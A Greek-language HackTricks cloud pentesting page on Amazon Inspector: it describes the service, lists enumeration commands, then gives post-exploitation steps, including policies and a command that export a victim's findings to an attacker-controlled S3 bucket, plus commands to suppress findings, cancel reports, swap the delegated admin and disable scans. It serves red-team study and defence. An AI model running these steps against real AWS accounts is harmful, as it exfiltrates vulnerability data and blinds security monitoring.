AWS - Inspector Enum

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Inspector

Το Amazon Inspector είναι μια προηγμένη, αυτοματοποιημένη υπηρεσία διαχείρισης ευπαθειών που έχει σχεδιαστεί για να ενισχύει την ασφάλεια του περιβάλλοντός σας AWS. Αυτή η υπηρεσία σαρώνει συνεχώς τις περιπτώσεις Amazon EC2, τις εικόνες κοντέινερ στο Amazon ECR, το Amazon ECS και τις λειτουργίες AWS Lambda για ευπάθειες και ακούσια έκθεση δικτύου. Εκμεταλλευόμενη μια ισχυρή βάση δεδομένων πληροφοριών ευπαθειών, το Amazon Inspector παρέχει λεπτομερή ευρήματα, συμπεριλαμβανομένων των επιπέδων σοβαρότητας και συστάσεων αποκατάστασης, βοηθώντας τις οργανώσεις να εντοπίζουν και να αντιμετωπίζουν προληπτικά τους κινδύνους ασφάλειας. Αυτή η συνολική προσέγγιση εξασφαλίζει μια ενισχυμένη στάση ασφάλειας σε διάφορες υπηρεσίες AWS, βοηθώντας στη συμμόρφωση και τη διαχείριση κινδύνων.

Key elements

Findings

Τα ευρήματα στο Amazon Inspector είναι λεπτομερείς αναφορές σχετικά με ευπάθειες και εκθέσεις που ανακαλύφθηκαν κατά τη διάρκεια της σάρωσης των περιπτώσεων EC2, των αποθετηρίων ECR ή των λειτουργιών Lambda. Βασισμένα στην κατάσταση τους, τα ευρήματα κατηγοριοποιούνται ως:

  • Active: Το εύρημα δεν έχει αποκατασταθεί.
  • Closed: Το εύρημα έχει αποκατασταθεί.
  • Suppressed: Το εύρημα έχει σημειωθεί με αυτή την κατάσταση λόγω ενός ή περισσότερων κανόνων καταστολής.

Τα ευρήματα κατηγοριοποιούνται επίσης σε τρεις τύπους:

  • Package: Αυτά τα ευρήματα σχετίζονται με ευπάθειες σε πακέτα λογισμικού που είναι εγκατεστημένα στους πόρους σας. Παραδείγματα περιλαμβάνουν παλιές βιβλιοθήκες ή εξαρτήσεις με γνωστά ζητήματα ασφάλειας.
  • Code: Αυτή η κατηγορία περιλαμβάνει ευπάθειες που βρέθηκαν στον κώδικα εφαρμογών που εκτελούνται στους πόρους AWS σας. Συνήθεις προβλήματα είναι τα σφάλματα κωδικοποίησης ή οι ανασφαλείς πρακτικές που θα μπορούσαν να οδηγήσουν σε παραβιάσεις ασφάλειας.
  • Network: Τα ευρήματα δικτύου εντοπίζουν πιθανές εκθέσεις στις ρυθμίσεις δικτύου που θα μπορούσαν να εκμεταλλευτούν οι επιτιθέμενοι. Αυτά περιλαμβάνουν ανοιχτές θύρες, ανασφαλείς πρωτόκολλες δικτύου και κακώς ρυθμισμένες ομάδες ασφαλείας.

Filters and Suppression Rules

Οι φίλτρα και οι κανόνες καταστολής στο Amazon Inspector βοηθούν στη διαχείριση και προτεραιοποίηση των ευρημάτων. Οι φίλτρα σας επιτρέπουν να διευκρινίσετε τα ευρήματα με βάση συγκεκριμένα κριτήρια, όπως η σοβαρότητα ή ο τύπος πόρου. Οι κανόνες καταστολής σας επιτρέπουν να καταστείλετε ορισμένα ευρήματα που θεωρούνται χαμηλού κινδύνου, έχουν ήδη μετριαστεί ή για οποιονδήποτε άλλο σημαντικό λόγο, αποτρέποντας την υπερφόρτωση των αναφορών ασφάλειας σας και επιτρέποντάς σας να εστιάσετε σε πιο κρίσιμα ζητήματα.

Software Bill of Materials (SBOM)

Ένα Software Bill of Materials (SBOM) στο Amazon Inspector είναι μια εξαγώγιμη, εσωτερική λίστα αποθεμάτων που περιγράφει όλα τα συστατικά εντός ενός πακέτου λογισμικού, συμπεριλαμβανομένων των βιβλιοθηκών και των εξαρτήσεων. Τα SBOM βοηθούν στην παροχή διαφάνειας στην αλυσίδα εφοδιασμού λογισμικού, επιτρέποντας καλύτερη διαχείριση ευπαθειών και συμμόρφωση. Είναι κρίσιμα για τον εντοπισμό και τη μείωση κινδύνων που σχετίζονται με ανοιχτού κώδικα και τρίτα μέρη λογισμικού.

Key features

Export findings

Το Amazon Inspector προσφέρει τη δυνατότητα εξαγωγής ευρημάτων σε Amazon S3 Buckets, Amazon EventBridge και AWS Security Hub, επιτρέποντάς σας να δημιουργείτε λεπτομερείς αναφορές των αναγνωρισμένων ευπαθειών και εκθέσεων για περαιτέρω ανάλυση ή κοινοποίηση σε συγκεκριμένη ημερομηνία και ώρα. Αυτή η δυνατότητα υποστηρίζει διάφορες μορφές εξόδου όπως CSV και JSON, διευκολύνοντας την ενσωμάτωσή τους με άλλα εργαλεία και συστήματα. Η λειτουργία εξαγωγής επιτρέπει την προσαρμογή των δεδομένων που περιλαμβάνονται στις αναφορές, επιτρέποντάς σας να φιλτράρετε τα ευρήματα με βάση συγκεκριμένα κριτήρια όπως η σοβαρότητα, ο τύπος πόρου ή το εύρος ημερομηνιών και περιλαμβάνοντας από προεπιλογή όλα τα ευρήματα σας στην τρέχουσα περιοχή AWS με κατάσταση Active.

Κατά την εξαγωγή ευρημάτων, είναι απαραίτητο ένα κλειδί Κεντρικής Διαχείρισης Κλειδιών (KMS) για την κρυπτογράφηση των δεδομένων κατά την εξαγωγή. Τα κλειδιά KMS διασφαλίζουν ότι τα εξαγόμενα ευρήματα προστατεύονται από μη εξουσιοδοτημένη πρόσβαση, παρέχοντας ένα επιπλέον επίπεδο ασφάλειας για ευαίσθητες πληροφορίες ευπαθειών.

Amazon EC2 instances scanning

Το Amazon Inspector προσφέρει ισχυρές δυνατότητες σάρωσης για τις περιπτώσεις Amazon EC2 για την ανίχνευση ευπαθειών και ζητημάτων ασφάλειας. Ο Inspector συγκρίνει τα εξαγόμενα μεταδεδομένα από την περίπτωση EC2 με κανόνες από τις συμβουλές ασφαλείας προκειμένου να παραγάγει ευπάθειες πακέτων και ζητήματα προσβασιμότητας δικτύου. Αυτές οι σαρώσεις μπορούν να πραγματοποιηθούν μέσω agent-based ή agentless μεθόδων, ανάλογα με τη ρύθμιση scan mode του λογαριασμού σας.

  • Agent-Based: Χρησιμοποιεί τον πράκτορα AWS Systems Manager (SSM) για να εκτελεί σε βάθος σαρώσεις. Αυτή η μέθοδος επιτρέπει τη συλλογή και ανάλυση δεδομένων απευθείας από την περίπτωση.
  • Agentless: Παρέχει μια ελαφριά εναλλακτική που δεν απαιτεί την εγκατάσταση ενός πράκτορα στην περίπτωση, δημιουργώντας ένα στιγμιότυπο EBS κάθε τόμου της περίπτωσης EC2, αναζητώντας ευπάθειες και στη συνέχεια διαγράφοντάς το, εκμεταλλευόμενη την υπάρχουσα υποδομή AWS για σάρωση.

Η μέθοδος σάρωσης καθορίζει ποια μέθοδος θα χρησιμοποιηθεί για την εκτέλεση σαρώσεων EC2:

  • Agent-Based: Περιλαμβάνει την εγκατάσταση του πράκτορα SSM στις περιπτώσεις EC2 για βαθιά επιθεώρηση.
  • Hybrid Scanning: Συνδυάζει τόσο τις μεθόδους agent-based όσο και agentless για να μεγιστοποιήσει την κάλυψη και να ελαχιστοποιήσει την επίδραση στην απόδοση. Σε εκείνες τις περιπτώσεις EC2 όπου είναι εγκατεστημένος ο πράκτορας SSM, ο Inspector θα εκτελέσει μια σάρωση με βάση τον πράκτορα, και για εκείνες όπου δεν υπάρχει πράκτορας SSM, η σάρωση που θα εκτελείται θα είναι χωρίς πράκτορα.

Μια άλλη σημαντική δυνατότητα είναι η βαθιά επιθεώρηση για τις περιπτώσεις EC2 Linux. Αυτή η δυνατότητα προσφέρει λεπτομερή ανάλυση του λογισμικού και της διαμόρφωσης των περιπτώσεων EC2 Linux, παρέχοντας λεπτομερείς αξιολογήσεις ευπαθειών, συμπεριλαμβανομένων των ευπαθειών του λειτουργικού συστήματος, των ευπαθειών εφαρμογών και των κακώς ρυθμισμένων παραμέτρων, εξασφαλίζοντας μια συνολική αξιολόγηση ασφάλειας. Αυτό επιτυγχάνεται μέσω της επιθεώρησης custom paths και όλων των υποκαταλόγων του. Από προεπιλογή, το Amazon Inspector θα σαρώσει τα εξής, αλλά κάθε μέλος λογαριασμού μπορεί να ορίσει έως 5 περισσότερους προσαρμοσμένους δρόμους, και κάθε εξουσιοδοτημένος διαχειριστής έως 10:

  • /usr/lib
  • /usr/lib64
  • /usr/local/lib
  • /usr/local/lib64

Amazon ECR container images scanning

Το Amazon Inspector παρέχει ισχυρές δυνατότητες σάρωσης για τις εικόνες κοντέινερ του Amazon Elastic Container Registry (ECR), διασφαλίζοντας ότι οι ευπάθειες πακέτων ανιχνεύονται και διαχειρίζονται αποτελεσματικά.

  • Basic Scanning: Αυτή είναι μια γρήγορη και ελαφριά σάρωση που εντοπίζει γνωστές ευπάθειες πακέτων OS σε εικόνες κοντέινερ χρησιμοποιώντας ένα τυπικό σύνολο κανόνων από το έργο ανοιχτού κώδικα Clair. Με αυτή τη ρύθμιση σάρωσης, τα αποθετήριά σας θα σαρώνονται κατά την προώθηση ή εκτελώντας χειροκίνητες σαρώσεις.
  • Enhanced Scanning: Αυτή η επιλογή προσθέτει τη δυνατότητα συνεχούς σάρωσης εκτός από τη σάρωση κατά την προώθηση. Η ενισχυμένη σάρωση εμβαθύνει στα στρώματα κάθε εικόνας κοντέινερ για να εντοπίσει ευπάθειες σε πακέτα OS και σε πακέτα γλωσσών προγραμματισμού με μεγαλύτερη ακρίβεια. Αναλύει τόσο την βασική εικόνα όσο και τυχόν επιπλέον στρώματα, παρέχοντας μια συνολική εικόνα των πιθανών ζητημάτων ασφάλειας.

Amazon Lambda functions scanning

Το Amazon Inspector περιλαμβάνει εκτενείς δυνατότητες σάρωσης για τις λειτουργίες AWS Lambda και τα στρώματά της, διασφαλίζοντας την ασφάλεια και την ακεραιότητα των serverless εφαρμογών. Ο Inspector προσφέρει δύο τύπους σάρωσης για τις λειτουργίες Lambda:

  • Lambda standard scanning: Αυτή η προεπιλεγμένη δυνατότητα εντοπίζει ευπάθειες λογισμικού στις εξαρτήσεις του πακέτου εφαρμογής που προστίθενται στη λειτουργία Lambda και στα στρώματα. Για παράδειγμα, αν η λειτουργία σας χρησιμοποιεί μια έκδοση μιας βιβλιοθήκης όπως το python-jwt με γνωστή ευπάθεια, δημιουργεί ένα εύρημα.
  • Lambda code scanning: Αναλύει τον προσαρμοσμένο κώδικα εφαρμογής για ζητήματα ασφάλειας, ανιχνεύοντας ευπάθειες όπως σφάλματα εισαγωγής, διαρροές δεδομένων, αδύναμη κρυπτογραφία και ελλείψεις κρυπτογράφησης. Καταγράφει αποσπάσματα κώδικα που επισημαίνουν τις ανιχνευθείσες ευπάθειες, όπως σκληρά κωδικοποιημένα διαπιστευτήρια. Τα ευρήματα περιλαμβάνουν λεπτομερείς προτάσεις αποκατάστασης και αποσπάσματα κώδικα για την επίλυση των ζητημάτων.

Center for Internet Security (CIS) scans

Το Amazon Inspector περιλαμβάνει σάρωσεις CIS για να συγκρίνει τα λειτουργικά συστήματα των περιπτώσεων Amazon EC2 με τις συστάσεις βέλτιστων πρακτικών από το Center for Internet Security (CIS). Αυτές οι σαρώσεις διασφαλίζουν ότι οι ρυθμίσεις συμμορφώνονται με τις βιομηχανικές προδιαγραφές ασφαλείας.

  • Configuration: Οι σάρωσεις CIS αξιολογούν αν οι ρυθμίσεις συστήματος πληρούν συγκεκριμένες συστάσεις Benchmark του CIS, με κάθε έλεγχο συνδεδεμένο με ένα ID ελέγχου CIS και τίτλο.
  • Execution: Οι σαρώσεις εκτελούνται ή προγραμματίζονται με βάση τις ετικέτες των περιπτώσεων και τους καθορισμένους προγραμματισμούς.
  • Results: Τα αποτελέσματα μετά τη σάρωση υποδεικνύουν ποιες έλεγχοι πέρασαν, παραλείφθηκαν ή απέτυχαν, παρέχοντας πληροφορίες σχετικά με τη στάση ασφάλειας κάθε περίπτωσης.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Μετά την Εκμετάλλευση

Tip

Από την οπτική γωνία ενός επιτιθέμενου, αυτή η υπηρεσία μπορεί να βοηθήσει τον επιτιθέμενο να βρει ευπάθειες και εκθέσεις δικτύου που θα μπορούσαν να τον βοηθήσουν να συμβιβάσει άλλες περιπτώσεις/δοχεία.

Ωστόσο, ένας επιτιθέμενος θα μπορούσε επίσης να ενδιαφέρεται να διαταράξει αυτή την υπηρεσία ώστε το θύμα να μην μπορεί να δει ευπάθειες (όλες ή συγκεκριμένες).

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Ένας επιτιθέμενος θα μπορούσε να δημιουργήσει λεπτομερείς αναφορές ευπαθειών ή λογαριασμούς υλικού λογισμικού (SBOMs) και να τις εξάγει από το περιβάλλον AWS σας. Αυτές οι πληροφορίες θα μπορούσαν να εκμεταλλευτούν για να εντοπίσουν συγκεκριμένες αδυναμίες, παρωχημένο λογισμικό ή ανασφαλείς εξαρτήσεις, επιτρέποντας στοχευμένες επιθέσεις.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

Το παρακάτω παράδειγμα δείχνει πώς να εξάγετε όλα τα ενεργά ευρήματα από το Amazon Inspector σε ένα Amazon S3 Bucket που ελέγχεται από τον επιτιθέμενο με ένα κλειδί Amazon KMS που ελέγχεται από τον επιτιθέμενο:

  1. Δημιουργήστε ένα Amazon S3 Bucket και επισυνάψτε μια πολιτική σε αυτό ώστε να είναι προσβάσιμο από το θύμα Amazon Inspector:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}
  1. Δημιουργήστε ένα κλειδί Amazon KMS και επισυνάψτε μια πολιτική σε αυτό ώστε να είναι χρησιμοποιήσιμο από τον Amazon Inspector του θύματος:
{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}
  1. Εκτελέστε την εντολή για να δημιουργήσετε την αναφορά ευρημάτων εξάγοντας την:
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
  • Πιθανές Επιπτώσεις: Δημιουργία και εξαγωγή λεπτομερών αναφορών ευπαθειών και λογισμικού, αποκτώντας πληροφορίες σχετικά με συγκεκριμένες ευπάθειες και αδυναμίες ασφαλείας.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Ένας επιτιθέμενος θα μπορούσε να ακυρώσει τη δημιουργία της καθορισμένης αναφοράς ευρημάτων ή της αναφοράς SBOM, αποτρέποντας τις ομάδες ασφαλείας από το να λάβουν έγκαιρες πληροφορίες σχετικά με ευπάθειες και λογαριασμούς υλικών λογισμικού (SBOMs), καθυστερώντας την ανίχνευση και αποκατάσταση θεμάτων ασφαλείας.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>
  • Πιθανές Επιπτώσεις: Διακοπή της παρακολούθησης ασφαλείας και πρόληψη έγκαιρης ανίχνευσης και αποκατάστασης θεμάτων ασφαλείας.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Ένας επιτιθέμενος με αυτές τις άδειες θα μπορούσε να χειριστεί τους κανόνες φιλτραρίσματος που καθορίζουν ποιες ευπάθειες και θέματα ασφαλείας αναφέρονται ή καταστέλλονται (αν η ενέργεια είναι ρυθμισμένη σε SUPPRESS, θα δημιουργηθεί ένας κανόνας καταστολής). Αυτό θα μπορούσε να κρύψει κρίσιμες ευπάθειες από τους διαχειριστές ασφαλείας, διευκολύνοντας την εκμετάλλευση αυτών των αδυναμιών χωρίς ανίχνευση. Αλλάζοντας ή αφαιρώντας σημαντικά φίλτρα, ένας επιτιθέμενος θα μπορούσε επίσης να δημιουργήσει θόρυβο πλημμυρίζοντας το σύστημα με άσχετα ευρήματα, εμποδίζοντας την αποτελεσματική παρακολούθηση και αντίδραση ασφαλείας.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>
  • Πιθανές Επιπτώσεις: Απόκρυψη ή καταστολή κρίσιμων ευπαθειών, ή πλημμύρισμα του συστήματος με άσχετα ευρήματα.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Ένας επιτιθέμενος θα μπορούσε να διαταράξει σημαντικά τη δομή διαχείρισης ασφάλειας.

  • Απενεργοποιώντας τον λογαριασμό του εξουσιοδοτημένου διαχειριστή, ο επιτιθέμενος θα μπορούσε να εμποδίσει την ομάδα ασφάλειας να έχει πρόσβαση και να διαχειρίζεται τις ρυθμίσεις και τις αναφορές του Amazon Inspector.
  • Ενεργοποιώντας έναν μη εξουσιοδοτημένο λογαριασμό διαχειριστή θα επέτρεπε σε έναν επιτιθέμενο να ελέγχει τις ρυθμίσεις ασφαλείας, ενδεχομένως απενεργοποιώντας σαρώσεις ή τροποποιώντας ρυθμίσεις για να κρύψει κακόβουλες δραστηριότητες.

Warning

Απαιτείται ο μη εξουσιοδοτημένος λογαριασμός να είναι στην ίδια Οργάνωση με το θύμα προκειμένου να γίνει ο εξουσιοδοτημένος διαχειριστής.

Για να γίνει ο μη εξουσιοδοτημένος λογαριασμός ο εξουσιοδοτημένος διαχειριστής, απαιτείται επίσης ότι μετά την απενεργοποίηση του νόμιμου εξουσιοδοτημένου διαχειριστή, και πριν ο μη εξουσιοδοτημένος λογαριασμός ενεργοποιηθεί ως εξουσιοδοτημένος διαχειριστής, ο νόμιμος διαχειριστής πρέπει να διαγραφεί ως εξουσιοδοτημένος διαχειριστής από την οργάνωση. Αυτό μπορεί να γίνει με την ακόλουθη εντολή (organizations:DeregisterDelegatedAdministrator απαιτείται άδεια): aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
  • Πιθανές Επιπτώσεις: Διαταραχή της διαχείρισης ασφάλειας.

inspector2:AssociateMember, inspector2:DisassociateMember

Ένας επιτιθέμενος θα μπορούσε να χειριστεί τη συσχέτιση των λογαριασμών μελών εντός μιας οργάνωσης Amazon Inspector. Με την συσχέτιση μη εξουσιοδοτημένων λογαριασμών ή την αποσυσχέτιση νόμιμων, ένας επιτιθέμενος θα μπορούσε να ελέγξει ποιους λογαριασμούς περιλαμβάνονται σε σάρωση ασφάλειας και αναφορές. Αυτό θα μπορούσε να οδηγήσει σε κρίσιμους λογαριασμούς να αποκλείονται από την παρακολούθηση ασφάλειας, επιτρέποντας στον επιτιθέμενο να εκμεταλλευτεί ευπάθειες σε αυτούς τους λογαριασμούς χωρίς ανίχνευση.

Warning

Αυτή η ενέργεια απαιτεί να εκτελείται από τον εξουσιοδοτημένο διαχειριστή.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
  • Πιθανές Επιπτώσεις: Αποκλεισμός βασικών λογαριασμών από σάρωση ασφαλείας, επιτρέποντας την εκμετάλλευση ευπαθειών χωρίς ανίχνευση.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

Ένας επιτιθέμενος με την άδεια inspector2:Disable θα μπορούσε να απενεργοποιήσει τις σαρώσεις ασφαλείας σε συγκεκριμένους τύπους πόρων (EC2, ECR, Lambda, κώδικας Lambda) στους καθορισμένους λογαριασμούς, αφήνοντας μέρη του περιβάλλοντος AWS χωρίς παρακολούθηση και ευάλωτα σε επιθέσεις. Επιπλέον, λόγω των αδειών inspector2:Enable & iam:CreateServiceLinkedRole, ένας επιτιθέμενος θα μπορούσε στη συνέχεια να επανενεργοποιήσει τις σαρώσεις επιλεκτικά για να αποφύγει την ανίχνευση ύποπτων ρυθμίσεων.

Warning

Αυτή η ενέργεια απαιτεί να εκτελείται από τον εξουσιοδοτημένο διαχειριστή.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
  • Πιθανές Επιπτώσεις: Δημιουργία τυφλών σημείων στην παρακολούθηση ασφαλείας.

inspector2:UpdateOrganizationConfiguration

Ένας επιτιθέμενος με αυτή την άδεια θα μπορούσε να ενημερώσει τις ρυθμίσεις για την οργάνωση Amazon Inspector σας, επηρεάζοντας τα προεπιλεγμένα χαρακτηριστικά σάρωσης που είναι ενεργοποιημένα για νέους λογαριασμούς μελών.

Warning

Αυτή η ενέργεια απαιτεί να εκτελείται από τον εξουσιοδοτημένο διαχειριστή.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
  • Πιθανές Επιπτώσεις: Αλλαγή πολιτικών και ρυθμίσεων σάρωσης ασφαλείας για τον οργανισμό.

inspector2:TagResource, inspector2:UntagResource

Ένας επιτιθέμενος θα μπορούσε να χειριστεί τις ετικέτες στους πόρους του AWS Inspector, οι οποίες είναι κρίσιμες για την οργάνωση, την παρακολούθηση και την αυτοματοποίηση των αξιολογήσεων ασφαλείας. Αλλάζοντας ή αφαιρώντας ετικέτες, ένας επιτιθέμενος θα μπορούσε ενδεχομένως να κρύψει ευπάθειες από τις σάρωσεις ασφαλείας, να διαταράξει την αναφορά συμμόρφωσης και να παρεμποδίσει τις αυτοματοποιημένες διαδικασίες αποκατάστασης, οδηγώντας σε ανεξέλεγκτα ζητήματα ασφαλείας και σε υπονόμευση της ακεραιότητας του συστήματος.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
  • Πιθανές Επιπτώσεις: Απόκρυψη ευπαθειών, διακοπή αναφορών συμμόρφωσης, διακοπή αυτοματοποίησης ασφάλειας και διακοπή κατανομής κόστους.

Αναφορές

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks